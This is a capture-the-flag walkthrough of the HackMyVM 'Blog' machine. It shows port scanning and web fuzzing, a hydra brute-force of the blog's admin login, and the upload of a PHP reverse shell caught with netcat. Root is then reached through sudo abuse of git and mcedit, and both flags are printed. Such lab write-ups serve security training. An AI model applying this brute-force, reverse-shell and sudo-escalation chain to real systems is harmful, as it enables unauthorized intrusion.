Blog
This machine was created by d4t4s3c
Port recognition withnmapor you can use recon
┌──(root@ghost)-[/home/ghost]
└─# recon blog.hmvm
.o oOOOOOOOo OOOo
Ob.OOOOOOOo OOOo. oOOo. .adOOOOOOO
OboO"""""""""""".OOo. .oOOOOOo. OOOo.oOOOOOo.."""""""""'OO
OOP.oOOOOOOOOOOO "POOOOOOOOOOOo. `"OOOOOOOOOP,OOOOOOOOOOOB'
`O'OOOO' `OOOOo"OOOOOOOOOOO` .adOOOOOOOOO"oOOO' `OOOOo
.OOOO' `OOOOOOOOOOOOOOOOOOOOOOOOOO' `OO
OOOOO '"OOOOOOOOOOOOOOOO"` oOO
oOOOOOba. .adOOOOOOOOOOba .adOOOOo.
oOOOOOOOOOOOOOba. .adOOOOOOOOOO@^OOOOOOOba. .adOOOOOOOOOOOO
OOOOOOOOOOOOOOOOO.OOOOOOOOOOOOOO"` '"OOOOOOOOOOOOO.OOOOOOOOOOOOOO
"OOOO" "YOoOOOOMOIONODOO"` . '"OOROAOPOEOOOoOY" "OOO"
Y 'OOOOOOOOOOOOOO: .oOOo. :OOOOOOOOOOO?' :`
: .oO%OOOOOOOOOOo.OOOOOO.oOOOOOOOOOOOO? .
. oOOP"%OOOOOOOOoOOOOOOO?oOOOOO?OOOO"OOo
'%o OOOO"%OOOO%"%OOOOO"OOOOOO"OOO':
`$" `OOOO' `O"Y ' `OOOO' o .
. . OP" : o .
:
.
[R3C0N] by 0bfxgh0st 4 WWA with ❤
[OS] Linux (99%)
Starting Nmap 7.92 ( https://nmap.org ) at 2022-09-19 19:24 EDT
NSE: Loaded 1 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 19:24
Completed NSE at 19:24, 0.00s elapsed
Initiating ARP Ping Scan at 19:24
Scanning blog.hmvm (10.0.2.22) [1 port]
Completed ARP Ping Scan at 19:24, 0.03s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 19:24
Scanning blog.hmvm (10.0.2.22) [65535 ports]
Discovered open port 22/tcp on 10.0.2.22
Discovered open port 80/tcp on 10.0.2.22
Completed SYN Stealth Scan at 19:24, 1.49s elapsed (65535 total ports)
NSE: Script scanning 10.0.2.22.
Initiating NSE at 19:24
Completed NSE at 19:24, 0.00s elapsed
Nmap scan report for blog.hmvm (10.0.2.22)
Host is up (0.000058s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
MAC Address: 08:00:27:B4:A6:4E (Oracle VirtualBox virtual NIC)
NSE: Script Post-scanning.
Initiating NSE at 19:24
Completed NSE at 19:24, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 1.74 seconds
Raw packets sent: 65536 (2.884MB) | Rcvd: 65536 (2.621MB)
[i] [Server info]
http://blog.hmvm:80 [200 OK] Apache[2.4.38], Country[RESERVED][ZZ], HTTPServer[Debian Linux][Apache/2.4.38 (Debian)], IP[10.0.2.22]
[+] [fuzzin server]
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Mon Sep 19 19:24:57 2022
URL_BASE: http://blog.hmvm:80/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
OPTION: Not Recursive
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://blog.hmvm:80/ ----
+ http://blog.hmvm:80/index.php (CODE:200|SIZE:271)
+ http://blog.hmvm:80/server-status (CODE:403|SIZE:274)
-----------------
END_TIME: Mon Sep 19 19:24:59 2022
DOWNLOADED: 4612 - FOUND: 2
recon reports two open ports and a few information more
┌──(root@ghost)-[/home/ghost]
└─# wfuzz --hc=404 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt http://blog.hmvm/FUZZ
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
********************************************************
Target: http://blog.hmvm/FUZZ
Total requests: 220560
=====================================================================
ID Response Lines Word Chars Payload
=====================================================================
000000003: 200 6 L 37 W 271 Ch "# Copyright 2007 James Fisher"
000000001: 200 6 L 37 W 271 Ch "# directory-list-2.3-medium.txt"
000000007: 200 6 L 37 W 271 Ch "# license, visit http://creativecommons.org/licenses/by-sa/3.0/"
000000014: 200 6 L 37 W 271 Ch "http://blog.hmvm/"
000000011: 200 6 L 37 W 271 Ch "# Priority ordered case sensative list, where entries were found"
000000006: 200 6 L 37 W 271 Ch "# Attribution-Share Alike 3.0 License. To view a copy of this"
000000008: 200 6 L 37 W 271 Ch "# or send a letter to Creative Commons, 171 Second Street,"
000000005: 200 6 L 37 W 271 Ch "# This work is licensed under the Creative Commons"
000000002: 200 6 L 37 W 271 Ch "#"
000000010: 200 6 L 37 W 271 Ch "#"
000000013: 200 6 L 37 W 271 Ch "#"
000000009: 200 6 L 37 W 271 Ch "# Suite 300, San Francisco, California, 94105, USA."
000000012: 200 6 L 37 W 271 Ch "# on atleast 2 different hosts"
000000004: 200 6 L 37 W 271 Ch "#"
000007428: 301 9 L 28 W 310 Ch "my_weblog"
000045240: 200 6 L 37 W 271 Ch "http://blog.hmvm/"
000095524: 403 9 L 28 W 274 Ch "server-status"
Total time: 0
Processed Requests: 220560
Filtered Requests: 220543
Requests/sec.: 0
Interesting dir my_weblog, more fuzzing
┌──(root@ghost)-[/home/ghost]
└─# wfuzz --hc=404 -w /usr/share/wfuzz/wordlist/general/big.txt http://blog.hmvm/my_weblog/FUZZ.php
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
********************************************************
Target: http://blog.hmvm/my_weblog/FUZZ.php
Total requests: 3024
=====================================================================
ID Response Lines Word Chars Payload
=====================================================================
000000119: 200 26 L 96 W 1395 Ch "admin"
000001350: 200 64 L 201 W 4297 Ch "index"
Total time: 0
Processed Requests: 3024
Filtered Requests: 3022
Requests/sec.: 0
At this point seems only one way login bruteforce
┌──(root@ghost)-[/home/ghost]
└─# hydra -t 50 -l admin -P rockyou.txt blog.hmvm http-post-form '/my_weblog/admin.php:username=admin&password=^PASS^:Incorrect'
Hydra v9.3 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2022-09-19 20:02:14
[DATA] max 50 tasks per 1 server, overall 50 tasks, 14344399 login tries (l:1/p:14344399), ~286888 tries per task
[DATA] attacking http-post-form://blog.hmvm:80/my_weblog/admin.php:username=admin&password=^PASS^:Incorrect
[STATUS] 137.00 tries/min, 137 tries in 00:01h, 14344262 to do in 1745:03h, 50 active
[80][http-post-form] host: blog.hmvm login: admin password: kisses
[STATUS] 4781466.33 tries/min, 14344399 tries in 00:03h, 1 to do in 00:01h, 3 active
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2022-09-19 20:05:37
We have admin credentials time to login. Searching for a tab to upload we found it under Plugins, Manage plugins, My image and click on configure. Create a shell and upload
┌──(root@ghost)-[/home/ghost]
└─# shellstorm.sh php-daemon 10.0.2.15 1337 > rev.php
Time to start netcat listener and execute shell by visiting http://blog.hmvm/my_weblog/content/private/plugins/my_image/image.php
┌──(root@ghost)-[/home/ghost]
└─# nc -lvp 1337
listening on [any] 1337 ...
connect to [10.0.2.15] from blog.hmvm [10.0.2.22] 52274
Linux blog 4.19.0-17-amd64 #1 SMP Debian 4.19.194-3 (2021-07-18) x86_64 GNU/Linux
02:15:54 up 56 min, 0 users, load average: 0.00, 0.00, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ python -c "import pty; pty.spawn('/bin/bash')"
www-data@blog:/$ sudo -l
Matching Defaults entries for www-data on blog:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User www-data may run the following commands on blog:
(admin) NOPASSWD: /usr/bin/git
www-data@blog:/$ sudo -u admin git help config
admin@blog:~$ cat /home/admin/user.txt
a8nuLuByPMCpuf4k3f146j9NtOsmi2dKZGN3m
Here user flag, time to get root
admin@blog:~$ sudo -l
Matching Defaults entries for admin on blog:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User admin may run the following commands on blog:
(root) NOPASSWD: /usr/bin/mcedit
This part is a little bit tricky
admin@blog:~$ sudo -u root /usr/bin/mcedit
Once open Press F9 and Enter, Go to User Menu and select s invoke shell
# cat /root/r0000000000000000000000000t.txt
fO6QQxO1oenROPf4k3f146vweJRVgbtPQ3RQ4